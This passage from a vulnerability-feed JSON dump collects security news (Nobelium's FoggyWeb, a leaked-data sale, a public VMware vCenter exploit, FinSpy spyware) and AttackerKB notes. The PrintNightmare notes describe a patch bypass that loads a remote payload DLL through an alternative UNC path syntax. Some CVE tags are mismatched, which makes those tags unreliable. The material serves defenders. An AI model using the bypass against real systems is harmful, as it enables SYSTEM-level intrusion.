data.\n\nMicrosoft also is advising that all customers review their AD FS Server configuration and implement whatever changes are needed to secure the systems from attacks.\n\n## **Tracking a Known Threat Actor**\n\nMicrosoft researchers have been keeping a wary eye on Nobelium since the company [got caught up](<https://threatpost.com/microsoft-solarwinds-spy-attack-federal-agencies/162414/>) in the [SolarWinds attack](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that was first discovered late last year. They\u2019ve been tracking the threat group\u2019s activity and capabilities, which have expanded as the actors have built and deployed new malware.\n\nSince [the SolarWinds incident](<https://threatpost.com/dhs-sophisticated-cyberattack-foreign-adversaries/162242/>), researchers have observed Nobelium steadily building out its arsenal beyond the Sunburst/Solorigate backdoor and Teardrop malware it initially deployed in that attack, which reached tens of thousands of organizations around the globe (though fewer than 100 were selected by the attackers for actual breach and compromise).\n\nThe group used malware called [Raindrop](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) in those follow-on SolarWinds attacks, then later added [GoldMax, GoldFinder and Sibot](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) malware for layered persistence to its toolset.\n\nMicrosoft researchers also identified EnvyScout, BoomBox, NativeZone and VaporRage as four pieces of malware that were used in a Nobelium [email-based attack chain](<https://threatpost.com/solarwinds-nobelium-phishing-attack-usaid/166531/>) earlier this year.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[**_JOIN_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[**_4 Golden Rules of Linux Security_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[**_REGISTER NOW_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T14:39:49", "type": "threatpost", "title": "SolarWinds Attackers Hit Active Directory Servers with FoggyWeb Backdoor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T14:39:49", "id": "THREATPOST:CD203B10BCB138850F42815F74C8A5AF", "href": "https://threatpost.com/solarwinds-active-directory-servers-foggyweb-backdoor/175056/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:42:30", "description": "On its own, the database of 3.8 billion phone numbers [leaked from ](<https://threatpost.com/clubhouse-users-data-hacker-forum/165354/>) social-media platform Clubhouse didn\u2019t have much value on the underground market. In fact, they were eventually dumped in a hacker forum for free.\n\nBut an enterprising threat actor has reportedly combined those phone numbers with 533 million [Facebook profiles leaked last April](<https://threatpost.com/facebook-accounts-leaked-check-exposed/165245/>) and is selling that enFhanced trove of personal identifiable information (PII) to the highest bidder on the underground market.\n\nAccording to CyberNews, the combined [Clubhouse-Facebook database](<https://cybernews.com/security/3-8-billion-allegedly-scraped-and-merged-clubhouse-and-facebook-user-records-put-for-sale-online/>) includes names, phone numbers and other data, and is listed on an underground forum for $100,000 for all 3.8 billion entries, with smaller chunks of data available for less. Reportedly, the seller is still looking for buyers.\n\n## **Data Likely to Fuel ATO Attacks **\n\nThese credentials could quickly be leveraged for basic account takeover (ATO) attacks, according to Brian Uffelman, who is a security analyst for PerimeterX.\n\n\u201cThese stolen credentials are then used for credential-stuffing and ATO attacks, which can steal value, whether that is in the form of gift cards, credit-card numbers, loyalty points or making false purchases,\u201d Uffelman told Threatpost. \u201cATO attacks are a major threat to any business and all of this just creates more fuel to feed the ATO attack fire.\u201d\n\nHe added that it\u2019s much easier for cybercriminals to use stolen credentials than to do the work of trying to find holes in an organization\u2019s cybersecurity defenses. In fact, Uffelman pointed out PerimeterX research showed out of all login attempts measured in the second-half of 2020, up to 85 percent were ATO attempts.\n\n\u201cOrganizations need to be aware of signs that they\u2019ve been attacked,\u201d Uffelman warned. \u201cThese can include surges in help-desk calls, spikes in password resets and inhuman user behaviors, such as thousands of login attempts on an account in a short time period and then take the appropriate action to block these attacks.\u201d\n\nUsers need to be aware of signs of breach, too, he added.\n\n\u201cConsumers need to ensure they are using varied and robust passwords across different websites and applications and lock down their credit reports as well.\u201d\n\n## **Facebook-Clubhouse Data Will Fuel Smishing Attacks **\n\n[Smishing](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>), or socially engineered phishing attempts conducted through SMS text messages, is a likely way cybercriminals will try to turn this database into profit, Jake Williams, from BreachQuest told Threatpost.\n\n\u201cWith this information, threat actors can send SMS phishes while spoofing the sender\u2019s number of a known friend,\u201d Williams said. \u201cA threat actor could go even further by using an SMS phishing pretext tailored to the victim based on their recent Facebook posts. Users are advised to be extremely careful in acting on unexpected SMS messages, even from senders they believe they know.\u201d\n\nWilliams added that Clubhouse users need to be on the lookout for suspicious texts, particularly those asking to transfer funds or confirm requests with a phone call, which are both common smishing tactics.\n\nAnd even if petty thieves don\u2019t see the value in the information, John Bambenek from Netenrich told Threatpost that he suspects intelligence agencies will take notice.\n\n\u201cBreaches like these often get sold at a discount because the ones who stole the data don\u2019t know what to do with it. In some cases, intelligence agencies will buy them if they have targets of interest on those platforms,\u201d Bambenek said. \u201cLikely the biggest use will go into the secondary consumer data market for those who want to build profiles for specific ad targeting.\u201d\n\nBeyond immediate ramifications of the enhanced data falling into the wrong hands, Archie Agarwal from ThreatModeler pointed out that as these leaks continue, it will enable threat actors to create incredibly rich profiles of targets.\n\n\u201cAside from using data like this for more targeted scamming, there is a much larger concern,\u201d Agarwal told Threatpost. \u201cAs we share more and more personal information across an ever-growing list of social-media platforms, combining data gleaned from this type of scraping, together with leaked breach information and leveraging big-data analytics to mine it, could potentially reveal previously hidden information and behaviors on users.\u201d\n\n## **Users Have Accepted Risks **\n\nWhile the infosec community is alarmed by the prospect of all that data floating around, Roger Grimes from KnowBe4 doesn\u2019t expect the seller of the combined Clubhouse-Facebook data to get much finanical gain out of the deal.\n\n\u201cMy bet is the seller doesn\u2019t get anywhere close to their $100,000 asking price. It\u2019s not a scarce resource,\u201d Grimes said in an email to Threatpost.\n\nHe also noted that while he agrees the data could fuel future smishing and other socially engineered attacks, he doesn\u2019t suspect much pushback from users.\n\n\u201cI think most people simply see this as a cost of using free internet services, Clubhouse or any other service,\u201d he said.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[_JOIN_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[_4 Golden Rules of Linux Security_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[_REGISTER NOW_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-27T14:59:58", "type": "threatpost", "title": "3.8 Billion Users\u2019 Combined Clubhouse, Facebook Data Up for Sale", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T14:59:58", "id": "THREATPOST:5E56D9C77DAD674F8B21F56E904893D4", "href": "https://threatpost.com/clubhouse-facebook-data-sale/175023/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:42:30", "description": "A fully working exploit for the critical CVE-2021-22005 remote code-execution (RCE) vulnerability in VMware vCenter is now public and being exploited in the wild.\n\nReleased on Monday by Rapid7 security engineer William Vu (who goes by the Twitter handle [wvu](<https://twitter.com/wvuuuuuuuuuuuuu>)), this one\u2019s different from the incomplete proof-of-concept (PoC) exploit that began making the rounds on Friday. This variant can be used to open a reverse shell on a vulnerable server, allowing remote attackers to execute arbitrary code.\n\nThe vulnerability can be exploited by unauthenticated, remote users and allows attackers to upload a file to the vCenter Server analytics service.\n\n## UPDATE: Indicators of Exploit\n\nUPDATE: 092821 16:21 The attack team at the attack surface management firm Randori also has a working RCE exploit for CVE-2021-22005. Zero-day finder Aaron Portnoy detailed the exploit in his [attack notes](<https://www.randori.com/blog/technical-analysis-vcenter-vmsa-2021-0020/>), which also include detection methods and indicators of exploit that defenders can use to determine whether or not they\u2019ve been exploited by this bug.\n\nRandori confirmed what VMware, CISA and everybody else is saying: Namely, that these vulnerabilities \u201care very serious issues,\u201d and that affected organizations \u201cshould take immediate action to ensure the security of impacted devices.\u201d As it is, Portnoy said, CISA has predicted a high likelihood that foreign actors will move quickly to exploit the vulnerability.\n\nPortnoy also reiterated what VMware has already stressed: To wit, users should just assume that they\u2019re already infected. \u201cOrganizations that have or had affected vCenter versions exposed to the Internet, since the vulnerability was made public on September 21, should assume that an adversary may have gained access to their network and review historical logs for anomalous behavior, such as abnormal usernames or source IP connections, and signs of compromise,\u201d he wrote.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nBelow is Vu\u2019s unredacted RCE proof-of-concept exploit against endpoints in servers that have the Customer Experience Improvement Program (CEIP) component enabled. Through [CEIP](<https://www.vmware.com/solutions/trustvmware/ceip.html>), VMware collects technical information about customers\u2019 use of its products. The CEIP is toggled [on as a default](<https://docs.vmware.com/en/VMware-Cloud-Foundation/4.0/com.vmware.vcf.vxrail.admin.doc/GUID-2B70F601-7D01-4609-AB1A-870A20485B67.html#:~:text=The%20Join%20the%20VMware%20Customer,Click%20Apply.>) setting in VMware Cloud Foundation.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28100106/Unredacted-RCE-PoC-against-CEIP-e1632837685764.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28100106/Unredacted-RCE-PoC-against-CEIP-e1632837685764.png>)\n\nUnredacted RCE PoC against VMware\u2019s CEIP. Source: [wvu](<https://twitter.com/wvuuuuuuuuuuuuu/status/1442634215330390020/photo/1>).\n\nNot that configurations matter with this vulnerability, VMware said last week. \u201cThis vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,\u201d said Bob Plankers, technical marketing architect at VMware, when VMware [announced](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) the vulnerability on Tuesday.\n\nCERT/CC vulnerability analyst [Will Dormann](<https://twitter.com/wdormann>) noted that a redacted PoC that Vu listed at the start of a thread that began on Friday didn\u2019t require CEIP to be enabled. \u201cUnclear if THAT one is being used in the wild now,\u201d Dormann said.\n\nAccording to Vu\u2019s [technical analysis](<https://www.bleepingcomputer.com/news/security/working-exploit-released-for-vmware-vcenter-cve-2021-22005-bug/>), the full, unredacted PoC starts with a request to create a directory for path traversal and schedules the spawn of a reverse shell.\n\n## History of a Bad Bug\n\n[VMware announced](<https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/>) CVE-2021-22005 a week ago, on Sept. 21, as part of a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that included patches for 19 CVE-numbered vulnerabilities that affect the company\u2019s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.\n\nThey were all serious, but CVE-2021-22005 \u2013 a critical arbitrary file upload vulnerability in the Analytics service \u2013 was assigned a CVSSv3 base score of 9.8 out of a maximum severity rating of 10. VMware urged users to declare an \u201cemergency change\u201d per [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types and to patch as soon as possible.\n\nAlso, on Friday, the Cybersecurity and Infrastructure Security Agency [(CISA) warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>) that VMware had confirmed that threat actors were exploiting the bug and that security researchers were reporting mass scanning for vulnerable vCenter servers and publicly available exploit code. CISA urged users with vulnerable systems to prioritize updating or to apply VMware\u2019s [workaround](<https://kb.vmware.com/s/article/85717>).\n\n\u201cDue to the availability of exploit code, CISA expects widespread exploitation of this vulnerability,\u201d the advisory stated.\n\n## Know What Assets Need to Be Patched\n\nIn addition to prioritizing patching, it\u2019s important to know about all the assets that need to be patched, according to Greg Fitzgerald, co-founder of the cybersecurity firm Sevco Security.\n\n\u201cWe\u2019ve found that the vast majority of enterprises have robust patch management tools that are extremely effective at what they\u2019re designed to do: Applying patches to assets that security and IT teams know about,\u201d he told Threatpost via email on Tuesday.\n\nHe continued: \u201cCompanies are not getting breached because their patch management tools aren\u2019t good enough. They\u2019re getting breached because it\u2019s impossible to patch an asset you don\u2019t know is there in the first place. Maintaining an accurate IT asset inventory in a dynamic environment is really hard to do. Threat actors figured that out a long time ago and work around the clock to exploit it. The first step to combating threats like this one is to establish a continuously updated, accurate inventory of all enterprise assets to serve as a foundational control for your security program.\u201d\n\n_**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T15:06:20", "type": "threatpost", "title": "Working PoC Is Out for VMware vCenter CVE-2021-22005 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T15:06:20", "id": "THREATPOST:5E0AFAA7B317D1BA456F06AE1A56D0A3", "href": "https://threatpost.com/working-exploit-vmware-vcenter-cve-2021-22005/175059/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:44:05", "description": "The FinSpy surveillance kit has been driven from its hiding place following an eight-month investigation by Kaspersky researchers. Detections of the spyware trojan have dwindled since 2018, but it turns out that it hasn\u2019t gone away \u2013 it\u2019s simply been hiding behind various first-stage implants that have helped to cloak its activities. At the same time, it\u2019s continued to advance its capabilities.\n\nFinSpy (aka FinFisher or Wingbird) is a multiplatform software for Windows, macOS and Linux that\u2019s marketed as a tool for law enforcement. However, much like [NSO Group\u2019s Pegasus](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>), it\u2019s often seen [being used for far more malicious purposes](<https://threatpost.com/finspy-modules-secure-messaging-apps/146372/>). First discovered in 2011, it\u2019s a full-service spyware, capable of stealing information and credentials as well as keeping tabs on user activities. For instance, it gathers file listings and deleted files, as well as various documents; can livestream or record data via webcam and microphone; can snoop on messaging chats; and it uses the developers\u2019 mode in browsers to intercept traffic protected with an HTTPS protocol. [![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn the middle of 2019, several suspicious installers for legitimate applications such as TeamViewer, VLC Media Player and WinRAR were found to contain malicious code. However, they didn\u2019t seem connected to any known malware, according to Kaspersky. But one day researchers stumbled across a Burmese-language website that hosted both the trojanized installers as well as samples of FinSpy for Android.\n\n\u201cWe began detecting some suspicious installers of legitimate applications, backdoored with a relatively small, obfuscated downloader,\u201d according to Kaspersky researchers Igor Kuznetsov and Georgy Kucherin, presenting at a retro-themed and virtual Security Analyst Summit (SAS) 2021 on Tuesday. \u201cOver the course of our investigation, we found out that the backdoored installers are nothing more than first-stage implants that are used to download and deploy further payloads before the actual FinSpy trojan.\u201d\n\n## **Multiple Evasion Techniques**\n\nThe new samples are protected with multiple layers of evasion tactics. For one, after a victim downloads and executes a trojanized application, they\u2019re vetted by two components, according to the analysis. The first is a \u201cpre-validator\u201d that runs multiple security checks to ensure that the device it is infecting does not belong to a security researcher.\n\nThe pre-validator downloads a host of security shellcodes from the command-and-control (C2) server and executes them \u2013 33 of them in all. Each shellcode collects specific system information (e.g., the current process name) and uploads it back to the server, researchers noted. If any of the checks fail, the command-and-control (C2) server terminates the infection process.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28125042/SAS-2-1024x527.png)\n\nKaspersky researchers Georgy Kucherin and Igor Kuznetsov and, presenting at the virtual Security Analyst Summit (SAS) 2021.\n\nIf all security checks pass, the server provides a second component, dubbed the \u201cpost-validator.\u201d It collects information that allows it to identify the victim machine and perhaps validate a specific target (it logs running processes, recently opened documents and screenshots) and sends it to a C2 server specified in its configuration.\n\nBased on the information collected, the C2 server decides whether to deploy the full-fledged trojan platform or remove the infection, according to Kaspersky.\n\nIf FinSpy is finally deployed, it arrives heavily obfuscated with four complex, custom-made obfuscators, according to Kaspersky\u2019s analysis.\n\n\u201cThe primary function of this obfuscation is to slow down the analysis of the spyware,\u201d the researchers explained.\n\nAnother evasion tactic involves a sample of FinSpy that infects machines by replacing the Windows UEFI bootloader, which is responsible for launching the operating system.\n\n\u201cThis method of infection allowed the attackers to install a bootkit without the need to bypass firmware security checks,\u201d according to [the research](<https://securelist.com/finspy-unseen-findings/104322/>). \u201cUEFI infections are very rare and generally hard to execute, they stand out due to their evasiveness and persistence. While in this case the attackers did not infect the UEFI firmware itself, but its next boot stage, the attack was particularly stealthy, as the malicious module was installed on a separate partition and could control the boot process of the infected machine.\u201d\n\nThe amount of work put into making FinSpy inaccessible to security researchers is particularly worrying, if impressive, said Kuznetsov. \u201cIt seems like the developers put at least as much work into obfuscation and anti-analysis measures as in the trojan itself,\u201d he noted. \u201cThe fact that this spyware is deployed with high precision and is practically impossible to analyze also means that its victims are especially vulnerable, and researchers face a special challenge \u2013 having to invest an overwhelming amount of resources into untangling each and every sample.\u201d\n\n## **Highly Modular FinSpy**\n\nKaspersky also looked into the capabilities of the latest samples to see if there have been advancements and found that FinSpy\u2019s architecture remains highly modular, but more difficult to analyze than ever. That\u2019s because a component called \u201cthe hider\u201d encrypts all of them.\n\n\u201cIt encrypts all of the memory pages, belonging to the whole infrastructure, including the orchestrator and all of the plugins, and all the memory pages will just stay encrypted until they are needed,\u201d explained Kuznetsov. \u201cThe moment the code has to be executed or data has to be accessed, that one page is decrypted. Then when it is no longer needed, it\u2019s just encrypted back.\u201d\n\nHe added, \u201cThis means that if you even make a live memory image of an infected machine it will be very hard to find the trojan in memory, because the only unencrypted thing that you will see, will be a tiny part of this hider.\u201d\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28124956/finspy-1024x492.png)\n\nSource: Kaspersky.\n\nThe hider is also responsible for starting \u201cthe orchestrator,\u201d which is a core module that will load the rest of the functionality and control the plugins, according to the analysis. It remains more or less the same as it was in previous samples, Kuznetsov said, but it adds a new module called \u201cthe communicator,\u201d which is a hard-coded binary within a resource section of the orchestrator used to maintain C2 communication.\n\nAnother new module is a process worm.\n\n\u201cThis doesn\u2019t infect or propagate between the machines. Instead, it propagates within the machine, starting from the top process where the whole architecture started (usually explorer.exe or Winlogon.exe),\u201d explained Kuznetsov. \u201cIt will make copies of itself in all the child processes, and all these child processes infected will maintain communication with the parent process.\u201d\n\nThis worm module also hooks the keyboard, mouse clicks and various APIs to FinSpy\u2019s various plugins, for data-collection purposes.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28124846/Finspy-plugin.png)\n\nSource: Kaspersky.\n\n\u201cThe plugins themselves are used mostly to collect information about the victim,\u201d he said. \u201cThere are not many plugins devoted to other tasks. We haven\u2019t found any plugins devoted to lateral movement for example, though there is one curious plugin that is devoted to infecting BlackBerry devices.\u201d\n\nThere are individual plugins for stealing credentials for VPNs, dial-up credentials, Microsoft product key information, browser search and browsing history, information about Wi-Fi connections, file listings, and more. There\u2019s also a generic plugin for recording audio from any voice over IP (VoIP) software.\n\n\u201cWhat is also interesting is that there are forensic tools for uncovering information about deleted files and storing that deleted-file history,\u201d Kuznetsov said. \u201cThere is also quite a unique plugin that exploits the debug function of modern browsers. By setting a particular environment variable, they make the browsers dump all the SSL encryption keys on disk. And by doing this, the attackers can decrypt all the SSL traffic from the victim.\u201d\n\nAll of the information can be collected in real time and can be live-streamed to the attackers or pre-recorded. Data collection can be triggered by launching an application of interest as well, the researcher noted.\n\nOne thing is clear: FinSpy remains under active development, and its authors have put a herculean effort into avoiding analysis.\n\n\u201cWe spent about eight months full time, with several researchers,\u201d Kuznetsov said. \u201cDuring that time we really had to upgrade all our tooling. We had to invent and make some tools from scratch, all of which led to producing a 300-page report on this. And what is the conclusion here? We think that there is no conclusion, because we believe that this story is never-ending. They will keep updating and upgrading their infrastructure, all the time.\u201d\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[**_JOIN_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[**_4 Golden Rules of Linux Security_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[**_REGISTER NOW_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T17:45:59", "type": "threatpost", "title": "SAS 2021: FinSpy Surveillance Kit Re-Emerges Stronger Than Ever", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T17:45:59", "id": "THREATPOST:88FF52A5E5D2048EB3D0F046F6D96C9F", "href": "https://threatpost.com/finspy-surveillance-kit/175068/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-18T16:42:20", "description": "Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability.\n\n \n**Recent assessments:** \n \n**NinjaOperator** at July 12, 2021 4:00pm UTC reported:\n\nSolarWinds was recently notified by Microsoft of a security vulnerability (RCE) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. While Microsoft\u2019s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor, our joint teams have mobilized to address it quickly.\n\nThe vulnerability exists in the latest Serv-U version 15.2.3 HF1 released May 5, 2021, and all prior versions. A threat actor who successfully exploits CVE-2021-34527 can run arbitrary code with SYSTEM privileges and install programs; view, change, or delete data, and run programs.\n\n**wvu-r7** at July 22, 2021 4:35pm UTC reported:\n\nSolarWinds was recently notified by Microsoft of a security vulnerability (RCE) related to Serv-U Managed File Transfer Server and Serv-U Secured FTP and have developed a hotfix to resolve this vulnerability. While Microsoft\u2019s research indicates this vulnerability exploit involves a limited, targeted set of customers and a single threat actor, our joint teams have mobilized to address it quickly.\n\nThe vulnerability exists in the latest Serv-U version 15.2.3 HF1 released May 5, 2021, and all prior versions. A threat actor who successfully exploits CVE-2021-34527 can run arbitrary code with SYSTEM privileges and install programs; view, change, or delete data, and run programs.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-35211", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-35211"], "modified": "2023-10-07T00:00:00", "id": "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "href": "https://attackerkb.com/topics/Toj3cA6kd7/cve-2021-35211", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:38:40", "description": "Windows Print Spooler Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**zeroSteiner** at July 08, 2021 5:09pm UTC reported:\n\nCVE-2021-34527 is related to the previous CVE-2021-1675. This fixes a vulnerability whereby an authenticated attacker can connect to the remote print service (via either MS-RPRN or MS-PAR) and add a driver using a custom DLL. Upon successful exploitation, the Print Spool service would load the attacker controlled DLL from either a remote UNC path or a local path. In both cases, the DLL is then executed with NT AUTHORITY\\SYSTEM privileges.\n\nThe patch for CVE-2021-34527 is effective at preventing this attack **only when Point and Print** is disabled, which is the default setting. This can be configured by ensuring the registry key `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` is 0. The system does not need to be rebooted to enforce the changed registry key. If that registry key is defined as 1, the vulnerability can still be exploited. With Point and Print enabled, a standard UNC path used over the MS-RPRN vector (via `RpcAddPrinterDriverEx`) will fail with `ERROR_INVALID_PARAMETER`. This can be bypassed by converting the UNC path from the standard syntax (`\\\\1.2.3.4\\public\\payload.dll`) to the alternative syntax (`\\??\\UNC\\1.2.3.4\\public\\payload.dll`).\n\nWith the patches applied and Point and Print disabled, the affected calls to `RpcAddPrinterDriverEx` will return ERROR_ACCESS_DENIED.\n\n**ccondon-r7** at July 08, 2021 12:12am UTC reported:\n\nCVE-2021-34527 is related to the previous CVE-2021-1675. This fixes a vulnerability whereby an authenticated attacker can connect to the remote print service (via either MS-RPRN or MS-PAR) and add a driver using a custom DLL. Upon successful exploitation, the Print Spool service would load the attacker controlled DLL from either a remote UNC path or a local path. In both cases, the DLL is then executed with NT AUTHORITY\\SYSTEM privileges.\n\nThe patch for CVE-2021-34527 is effective at preventing this attack **only when Point and Print** is disabled, which is the default setting. This can be configured by ensuring the registry key `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` is 0. The system does not need to be rebooted to enforce the changed registry key. If that registry key is defined as 1, the vulnerability can still be exploited. With Point and Print enabled, a standard UNC path used over the MS-RPRN vector (via `RpcAddPrinterDriverEx`) will fail with `ERROR_INVALID_PARAMETER`. This can be bypassed by converting the UNC path from the standard syntax (`\\\\1.2.3.4\\public\\payload.dll`) to the alternative syntax (`\\??\\UNC\\1.2.3.4\\public\\payload.dll`).\n\nWith the patches applied and Point and Print disabled, the affected calls to `RpcAddPrinterDriverEx` will return ERROR_ACCESS_DENIED.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T00:00:00", "type": "attackerkb", "title": "CVE-2021-34527 \"PrintNightmare\"", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 